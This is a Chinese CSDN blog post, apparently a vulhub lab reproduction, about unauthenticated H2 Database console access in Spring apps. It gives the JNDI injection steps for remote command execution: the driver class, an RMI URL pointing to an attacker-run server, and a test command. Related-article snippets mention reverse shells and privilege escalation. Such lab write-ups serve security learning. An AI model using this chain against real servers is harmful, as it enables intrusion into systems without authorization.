H2 Database Console 未授权访问

最新推荐文章于 2024-07-05 18:03:43 发布
最新推荐文章于 2024-07-05 18:03:43 发布
阅读量672 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/118018151
版权

漏洞背景

H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权:

  • spring.h2.console.enabled=true
  • spring.h2.console.settings.web-allow-others=true

利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。

漏洞复现

我们这里需要利用JNDI注入工具来复现
下载工具后进入目录,修改config.properties文件,将命令改为touch /tmp/success
在这里插入图片描述
更改保存后,启动jar程序
在这里插入图片描述
访问http://your_ip:8080/h2-console/
驱动类内填:

javax.naming.InitialContext

JDBC URL内填(即jar程序显示的rmi地址):

rmi://172.18.0.1:23456/BypassByEL

在这里插入图片描述
点击链接后,回到靶机查看
在这里插入图片描述

小 白 萝 卜
关注
专栏目录
H2db console 授权访问RCE 漏洞复现+利用(CVE-2022-23221)
0xSec
02-21 3146
H2 数据库控制台中的另一个经身份验证的 RCE 漏洞,在 v2.1.210+ 中修复。2.1.210 之前的 H2 控制台允许远程攻击者通过包含 IGNORE_UNKNOWN_SETTINGS=TRUE;INIT=RUNSCRIPT 子字符串的 jdbc:h2:mem JDBC URL 执行任意代码。
【实战系列4】H2 Database Console授权访问/命令执行漏洞到msf内网提权渗透
04-13 1455
通过H2Database Console的命令执行漏洞,结合windows的powershell反弹shell,再利用msf提权并开启rdp服务,在管理员修改了默认的rdp端口3389的情况下,利用命令找到真正的rdp服务端口,远程连接控制目标主机。
H2 Database Console授权访问漏洞封堵
本博客纯属个人网络笔记,如对阁下有用,甚喜;否则,关掉即可,不喜勿喷。专心写代码,不做键盘侠!
07-05 394
H2 Database Console授权访问,默认情况下自动创建不存在的数据库,从而导致授权访问。网络上能搜到各种授权访问的教程,但是它怎么封堵呢?
H2 Database Console授权访问
zzzzz1284的博客
01-06 1075
H2 Database Console授权访问
H2 Database Console授权访问漏洞复现+利用
0xSec
04-08 1966
H2 database是一款Java内存数据库,多用于单元测试。利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。
H2 Database Console 授权访问复现
不想当脚本小子的脚本小子
01-27 1626
漏洞概述: H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。 环境搭建 使用vulhub来安装环境 进入h2
数据库应用-H2database--授权访问&命令执行漏洞
XXokok的博客
11-26 628
数据库应用-H2database--授权访问&命令执行漏洞
H2database 授权访问 vulhub
c0529的博客
06-12 454
打开之后是一个访问的页面,我们需要用java语言驱动让这个网站主动访问其他主机并且执行命令,我们需要用到一开始写在最前面的工具进行生成rmi。我出现的一个问题就是反弹不出去,我想了想可能是要在我的外网上面java生成命令才对,但是等我反应过来,我已经把容器关掉了。在驱动选择:javax.naming.InitialContext。被反弹shell的机子:可以就用kali,或者配一台外网服务器。出现下方红色的字体就成功了,同时你的主机检测到了这个网站的访问。虚拟机:kali+docker。
H2database-授权访问漏洞复现
weixin_45366453的博客
06-29 3058
H2 database是一款Java内存数据库,多用于单元测试。默认端口:20051H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。执行如下命令启动一个Springboot + h2database环境:启动后,访问即可查看到H2 database的管理页面。下载JNDI-Injection-Exploithttps://github.co
服务攻防——数据库安全授权访问、弱口令
m0_61506558的博客
12-14 622
关于判断服务是否开放进行信息收集的内容,可能通过扫描工具,如果遇到WAF的话,通过常用搭建网站的组件进行尝试,或者通过特定服务提供的报错信息进行判断......由于基于 Erlang 的 JSON 解析器和基于 JavaScript 的 JSON 解析器的差异,在 1.7.0 之前的 Apache CouchDB 和 2.1.1 之前的 2.x 中,可以提交_users具有重复键的文档,roles用于数据库内的访问控制,包括特例_admin角色,表示管理用户。
SpringBoot2.x系列教程45--整合H2数据库之代码实现
一一哥
04-02 648
SpringBoot2.x系列教程45--整合H2数据库之代码实现 作者:一一哥 我在上一章节中详细讲解了H2数据库,接下来我带大家在Spring Boot中整合H2数据库,实现代码操作。 一. Spring Boot中整合H2数据库 1. 创建Web项目 我们按照之前的经验,创建一个web程序,并将之改造成Spring Boot项目,具体过程略。 2. 添加依赖包 <de...
vulhub-Couchdb+H2database漏洞复现(简单好上手)
qq_68064663的博客
11-15 338
vulhub-Couchdb+H2database漏洞复现(简单好上手)
spring相关漏洞复现
Shanfenglan's blog
12-30 1326
文章目录1. H2 Database web端授权访问导致的rce2. Spring Security OAuth2 rce -- CVE-2016-49773. Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)4. Spring Data Commons 远程命令执行漏洞(CVE-2018-1273) 1. H2 Database web端授权访问导致的rce 2. Spring Security OAuth2 rce – CVE-2016-4977 Spring Se
vulhub通关实战二(附docker vulhub 虚拟机环境)
悦分享
12-27 1088
H2 database是一款Java内存数据库,多用于单元测试。利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。启动后,访问即可查看到H2 database的管理页面。目标环境是Java 8u252,版本较高,因为上下文是Tomcat环境,我们可以参考《》,使用加EL表达式注入的方式来执行任意命令。我们可以借助这个小工具简化我们的复现过程。首先设置JNDI工具中执行的命令为然后启动,在h2 console页面填入JNDI类名和URL地址:其中,
爆肝!!包含复现流程、部分exp、poc和编码小脚本的11个Spring漏洞复现合集
qq_43606723的博客
07-31 1710
这篇包含复现流程、部分exp、poc、加工小脚本和小心得的11个Spring漏洞复现合集是我与shmily师傅利用hvv前的空余时间复现、编写出来的。希望能简化大家开始着手系统性学习Spring框架的繁琐流程,提升学习效率。文章内容如有不妥和错误,请大佬们斧正。...
数据库漏洞-Influxdb+H2database 复现
xiaoheizi的博客
07-10 830
命令:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/success -A "服务器ip"抓取/query页面的数据包,将Get请求更改为Post请求,在请求中添加令牌,并且添加 POST 请求键值对:db=sample&q=show users。下载漏洞利用工具:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0。
vulhub-spring漏洞复现
qq_51922767的博客
09-14 2714
vulhub-spring漏洞复现
如何在application.properties或application.yml文件中启用了H2 Console,例如添加 spring.h2.console.enabled=true
最新发布
10-09
在Spring Boot应用中启用H2 Console,你需要在`application.properties`或`application.yml`文件中添加特定的配置项,用于开启H2 Database的控制台功能并设置其访问端口。以下是这两个文件中相应的配置示例: **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值